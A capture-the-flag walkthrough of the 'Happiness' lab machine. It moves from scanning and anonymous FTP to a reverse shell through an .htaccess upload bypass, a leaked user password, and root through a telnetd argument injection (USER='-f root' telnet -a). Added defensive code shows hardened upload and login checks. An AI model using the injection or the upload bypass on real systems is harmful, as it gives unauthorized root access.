Mazesec_Happiness

Target machine source: QQ group 660930334

Difficulty: Easy

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0020s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0015s latency).
MAC Address: 08:00:27:AA:CF:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.59
Host is up (0.00054s latency).
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.02 seconds

Target IP: 192.168.2.59

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.59
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

Open ports: 22, 21, 80

2) Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p21,22,80 192.168.2.59
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00049s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.2.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 0 0 20 Jan 22 12:27 readme.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.90 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.59
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:18 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00065s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 113.26 seconds

II. Web Penetration

1. Port 21 - FTP

The scan shows that the FTP service allows anonymous login.

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.59
Connected to 192.168.2.59.
220 Have fun!
Name (192.168.2.59:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||61476|)
150 Here comes the directory listing.
dr-xr-xr-x 2 0 0 4096 Jan 22 12:27 .
dr-xr-xr-x 2 0 0 4096 Jan 22 12:27 ..
-r--r--r-- 1 0 0 20 Jan 22 12:27 readme.txt
226 Directory send OK.
ftp> cat readme.txt
?Invalid command.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43481|)
150 Opening BINARY mode data connection for readme.txt (20 bytes).
100% |****************************************************************************************************************************************| 20 1.21 KiB/s 00:00 ETA
226 Transfer complete.
20 bytes received in 00:00 (1.14 KiB/s)
ftp> exit
221 Goodbye.

┌──(root㉿kali)-[~/miaosec]
└─# cat readme.txt
http://tmpfile.dsz/

This reveals the domain name tmpfile.dsz.

2. Port 80 - Website

Visiting port 80 shows nothing of interest.

III. File Upload

Visit the domain tmpfile.dsz.

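An attempt to upload a reverse shell script is rejected with a message that the upload is not allowed; testing shows that the filter is a blacklist.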

.htaccess parsing vulnerability

Upload the reverse shell script.

A shell is obtained successfully.

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.59] 37200
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
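
The blacklist filter described above let `.htaccess` through because it only enumerates names it considers dangerous. As an added example (not the target application's code; the extension lists, sample file names and function names are assumptions made for illustration), the weak check is shown beside an allowlist check that rejects dotfiles and stacked extensions:

```python
import os
import re
import secrets

# Assumed policy for illustration: the upload form only needs to accept images.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
# Constructed blacklist: it enumerates script extensions and nothing else.
BLACKLISTED_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".phar"}


def blacklist_accepts(filename):
    """Weak check: accept anything whose extension is not explicitly listed."""
    ext = os.path.splitext(filename.lower())[1]
    return ext not in BLACKLISTED_EXTENSIONS


def allowlist_accepts(filename):
    """Hardened check: accept only plain names whose extensions are all allowed."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    # Reject dotfiles (.htaccess, .user.ini), empty names and odd characters.
    if not re.fullmatch(r"[a-z0-9][a-z0-9_-]*(\.[a-z0-9]+)+", name):
        return False
    # Every extension must be allowed, so "shell.php.jpg" is rejected too.
    return all("." + part in ALLOWED_EXTENSIONS for part in name.split(".")[1:])


def stored_name(filename):
    """Store under a server-generated name so the client never chooses the path."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


# Constructed sample uploads (file names only).
SAMPLES = ["photo.jpg", "shell.php", ".htaccess", "shell.php.jpg", "notes.PNG"]


def compare(samples=SAMPLES):
    """Map each name to (blacklist verdict, allowlist verdict)."""
    return {n: (blacklist_accepts(n), allowlist_accepts(n)) for n in samples}


if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:15} blacklist={weak!s:5} allowlist={strong}")
```

On Apache, setting `AllowOverride None` for the upload directory additionally makes the server ignore any `.htaccess` file that ends up there.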

Stabilize the shell

/usr/bin/script -qc /bin/bash /dev/null
# Press Ctrl+Z to suspend it
stty raw -echo; fg
# Press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege Escalation

1. Getting access as Eecho

The password of the user Eecho is found under the /opt directory.

www-data@Happiness:/home/Eecho$ cat /opt/Eecho_pass.txt 
Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

Access as Eecho is obtained.

www-data@Happiness:/home/Eecho$ su Eecho
Password:
Eecho@Happiness:~$ id
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)

2. Getting root

List the locally listening ports.

Eecho@Happiness:~$ ss -tlnup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:7 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:9 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:13 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:19 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:37 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:19 0.0.0.0:*
tcp LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:23 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:37 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:7 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:9 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:13 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
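
The loopback-only listeners in this output never appeared in the external nmap scans, yet any local user can reach them. As an added example (not part of the original write-up; the function names and port table are this example's own), a host audit can flag such legacy services directly from `ss` output, here run over lines copied from the listing above:

```python
# Legacy inetd-era services by their well-known port numbers.
LEGACY_PORTS = {7: "echo", 9: "discard", 13: "daytime", 19: "chargen",
                23: "telnet", 37: "time"}

# Lines copied from the `ss -tlnup` output shown above.
SS_OUTPUT = """\
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:7 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:19 0.0.0.0:*
tcp LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:23 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
"""


def legacy_listeners(ss_text):
    """Return (proto, address, port, service) for each legacy service socket."""
    findings = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue  # header or unrelated line
        # The local address is the 5th column; split on the last ':' so that
        # IPv6 forms such as [::]:22 are handled as well.
        addr, _, port = fields[4].rpartition(":")
        if port.isdigit() and int(port) in LEGACY_PORTS:
            findings.append((fields[0], addr, int(port), LEGACY_PORTS[int(port)]))
    return findings


def loopback_only(findings):
    """Sockets invisible to a remote port scan but reachable by local users."""
    return [f for f in findings if f[1] in ("127.0.0.1", "[::1]")]


if __name__ == "__main__":
    for proto, addr, port, service in loopback_only(legacy_listeners(SS_OUTPUT)):
        print(f"legacy service {service} listening on {proto} {addr}:{port}")
```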

Port 23 is open on the loopback interface; try connecting to it.

Eecho@Happiness:~$ telnet 127.0.0.1
bash: telnet: command not found
Eecho@Happiness:~$ busybox telnet 127.0.0.1

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Happiness login:

The latest vulnerability, CVE-2026-24061

Check whether it is present

Eecho@Happiness:~$ dpkg -S /usr/sbin/telnetd && telnetd --version
inetutils-telnetd: /usr/sbin/telnetd
telnetd (GNU inetutils) 2.0
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

telnetd (GNU inetutils) 2.0 meets the requirement, so try to exploit it.

USER='-f root' telnet -a 127.0.0.1 23

Root access is obtained.

Eecho@Happiness:~$ USER='-f root' busybox telnet -a 127.0.0.1 23

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Last login: Thu Jan 22 23:44:10 EST 2026 from 192.168.1.12 on pts/0
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@Happiness:~# id
uid=0(root) gid=0(root) groups=0(root)
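
The `USER='-f root'` value used above is an argument injection: a string meant to be a user name is read as the `-f` option of login(1), which skips authentication. As an added example (a simplified model, not inetutils code; the command template, the user-name pattern and all function names are assumptions), the unsafe way of building the login command line is shown beside a validated one:

```python
import re

# Hypothetical command template for illustration; not copied from inetutils.
LOGIN_TEMPLATE = "/bin/login -p -h {host} {user}"

# Conservative account-name pattern: cannot start with '-', no whitespace.
SAFE_USER = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")


def build_argv_unsafe(host, user):
    """Substitute first, tokenize second: the value can add new arguments."""
    return LOGIN_TEMPLATE.format(host=host, user=user).split()


def build_argv_safe(host, user):
    """Validate the value, keep it as a single argv element, and place it
    after '--', the conventional end-of-options marker for getopt parsers."""
    if not SAFE_USER.fullmatch(user):
        raise ValueError(f"rejected user name: {user!r}")
    return ["/bin/login", "-p", "-h", host, "--", user]


def injected_options(argv, expected=("-p", "-h")):
    """Options in argv that the daemon itself never intended to pass."""
    seen = []
    for arg in argv[1:]:
        if arg == "--":
            break  # everything after '--' is an operand, not an option
        if arg.startswith("-") and arg not in expected:
            seen.append(arg)
    return seen


if __name__ == "__main__":
    # The value from the page, sent by the client as its USER variable.
    print(build_argv_unsafe("localhost", "-f root"))
    print(injected_options(build_argv_unsafe("localhost", "-f root")))
    print(build_argv_safe("localhost", "Eecho"))
```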

V. Reading the Flags

root@Happiness:~# cat /root/root.txt /home/Eecho/user.txt 
flag{root-b52bb1635e544c3f968822ab6c7a745d}
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}

Mazesec_Happiness
http://miao-sec.github.io/Maze-sec/Mazesec-Happiness/
Author: Miao
Published: January 26, 2026
License: BY-MIAO